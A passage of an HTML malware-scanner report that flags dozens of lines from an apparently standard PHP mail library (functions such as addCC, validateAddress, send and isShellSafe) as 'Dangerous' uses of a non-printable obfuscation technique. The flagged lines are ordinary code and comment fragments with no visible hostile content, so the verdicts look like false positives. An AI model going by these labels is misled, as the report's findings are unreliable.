<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'cc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1082</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addBCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'bcc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1093</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addReplyTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'Reply-To'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function), </span><span style="color: #0000BB">addition of such addresses is delayed until send</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">do </span><span style="color: #0000BB">not </span><span style="color: #007700">throw </span><span style="color: #0000BB">exceptions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1110</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'addAnAddress'</span><span style="color: #007700">), </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">the IMAP extension is available</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parseAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$addrstr</span><span style="color: #007700">, </span><span style="color: #0000BB">$useimap </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'imap_rfc822_parse_adrlist'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$isHtml </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setFrom</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$auto </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the Message</span><span style="color: #007700">-</span><span style="color: #0000BB">ID header of the last email</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getLastMessageID</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1321</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">lastMessageID</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #DD0000">'@'</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1343</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validateAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$patternselect </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$patternselect</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1365</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'extension_loaded'</span><span style="color: #007700">) and </span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'pcre'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1385</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1425</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) >= </span><span style="color: #0000BB">3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1430</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">filter_var</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">FILTER_VALIDATE_EMAIL</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool </span><span style="color: #DD0000">"true" </span><span style="color: #007700">if </span><span style="color: #0000BB">required functions </span><span style="color: #007700">for </span><span style="color: #0000BB">IDN support are present</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1439</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">idnSupported</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">PHP </span><span style="color: #007700"><= </span><span style="color: #0000BB">5.2</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1442</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'idn_to_ascii'</span><span style="color: #007700">) and </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_convert_encoding'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1448</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">silently returns unmodified address </span><span style="color: #007700">if:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1450</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are not available</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The encoded address in ASCII form</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">punyencodeAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">CharSet</span><span style="color: #007700">, and </span><span style="color: #0000BB">at</span><span style="color: #007700">-</span><span style="color: #0000BB">sign</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">) . </span><span style="color: #0000BB">$punycode</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1473</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$address</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1480</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean false on error </span><span style="color: #007700">- </span><span style="color: #0000BB">See the ErrorInfo property </span><span style="color: #007700">for </span><span style="color: #0000BB">details of the error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1482</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1488</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">postSend</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1504</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">preSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1604</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">postSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1611</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">$sendMethod</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1643</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1717</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isShellSafe</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that access local file paths</span><span style="color: #007700">,</span>
</span>
